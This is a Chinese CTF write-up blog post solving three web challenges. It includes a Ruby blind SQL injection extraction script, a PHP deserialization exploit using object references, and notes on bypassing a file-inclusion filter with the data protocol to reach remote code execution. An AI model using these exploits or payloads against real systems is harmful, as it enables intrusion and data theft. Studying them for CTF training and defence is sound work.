Author:颖奇L’Amore

Blog:www.gem-love.com


easiestSQLi

布尔盲注+二分注入

#!/usr/bin/ruby -w
#-*- coding:utf-8 -*-
#__author__: 颖奇L'Amore

require "open-uri"
result = ''
1000.times do |i|
  low = 32
  high = 128
  mid = ( low + high ) / 2
  while low < high
    url = "http://[your_docker_container].cloudeci1.ichunqiu.com/?id=1=((ascii(substr((select(flag)from(flag)),#{i+1},1)))>#{mid})"
    res = nil
    open(url) do |http|
      res = http.read
    end
    if res['AGAIN'] === nil
      low = mid + 1
    else
      high = mid
    end
    mid = ( low + high ) / 2
    if mid == 32 or mid == 127
      break
    end
  end
  result += mid.chr
  puts result
end

Inclusion

读源码找类和反序列化位点

<?php
class Seri{
    public $alize;
    public function __construct($alize) {
        $this->alize = $alize;
    }
    public function __destruct(){
        $this->alize->getFlag();
    }
}

class Flag{
    public $f;
    public $t1;
    public $t2;

    function __construct($file){
        echo "Another construction!!";
        $this->f = $file;
        $this->t1 = $this->t2 = md5(rand(1,10000));
    }

    public function getFlag(){
        $this->t2 = md5(rand(1,10000));
        echo $this->t1;
        echo $this->t2;
        if($this->t1 === $this->t2)
        {
            if(isset($this->f)){
                echo @highlight_file($this->f,true);
            }
        } else {
            echo "no";
        }
    }
}
$p = $_GET['p'];
if (isset($p)) {
    $p = unserialize($p);
} else {
    echo "NONONO";
}
?>

1/10000的成功率,发10000个包爆破有很大概率能够得到flag

利用指针即可,exp:

<?php
class Seri{
    public $alize;
    function __construct()
    {
        $this->alize = new Flag;
    }
}

class Flag{
    public $f;
    public $t1;
    public $t2;
    function __construct(){
        $this->t2 = md5(rand(1,10000));
        $this->t1 = &$this->t2;
        $this->f = 'flag.php';
    }
}
$seri = new Seri();
echo serialize($seri); 
//O:4:"Seri":1:{s:5:"alize";O:4:"Flag":3:{s:1:"f";s:8:"flag.php";s:2:"t1";s:32:"1a336426e09602a4f0118326dd6c72ac";s:2:"t2";R:4;}}

Soitgoes

可以用php wrapper,但是过滤了base、rot、string等关键字。利用平时不常见的过滤器读flag.php源码即可


文件包含绕过

vim临时文件得到源码

<?php
    header("Content-type: text/html; charset=utf-8");
    echo "该死,我的电脑总断电,还好编辑器能帮我恢复,吓死惹";
    stream_wrapper_unregister('php');

    $seperate = bin2hex(rand(1,1000000));


    $mkdir = function($dir) {
        system('mkdir -p '.escapeshellarg($dir));
    };

    $mkdir('users/'.$seperate);
    chdir('users/'.$seperate);

    function getIp(){
        $ip = '';
        if(isset($_SERVER['HTTP_X_FORWARDED_FOR'])){
            $ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
        }elseif(isset($_SERVER['HTTP_CLIENT_IP'])){
            $ip = $_SERVER['HTTP_CLIENT_IP'];
        }else{
            $ip = $_SERVER['REMOTE_ADDR'];
        }
        $ip_arr = explode(',', $ip);
        return $ip_arr[0];
    }

    $curf = getIp();
    $curf = basename(str_replace('.','',$curf));
    $curf = basename(str_replace('-','',$curf));


    $mkdir($curf);
    chdir($curf);
    file_put_contents('res',print_r($_SERVER,true));
    chdir('..');
    $_GET['page']=str_replace('.','',$_GET['page']);
    if(!stripos(file_get_contents($_GET['page']),'<?') && !stripos(file_get_contents($_GET['page']),'php')) {
        include($_GET['page']);
    }

    chdir(__DIR__);
    system('rm -rf users/'.$seperate);

?>

利用file_get_contents()include()时对于data协议处理的差异,即可绕过waf、包含并RCE

颖奇L'Amore原创文章,转载请注明作者和文章链接

本文链接地址:https://www.gem-love.com/ctf/2549.html

注:本站定期更新图片链接,转载后务必将图片本地化,否则图片会无法显示

分类: CTF

颖奇L'Amore

Most of the time is also called Y1ng. Cisco Certified Internetwork Expert - Routing and Switching. CTF player for team r3kapig. Forcus on Web Security. Islamic Scholar. Be good at sleeping and fishing in troubled waters.

0 条评论

发表评论

电子邮件地址不会被公开。 必填项已用*标注

在此处输入验证码 : *

Reload Image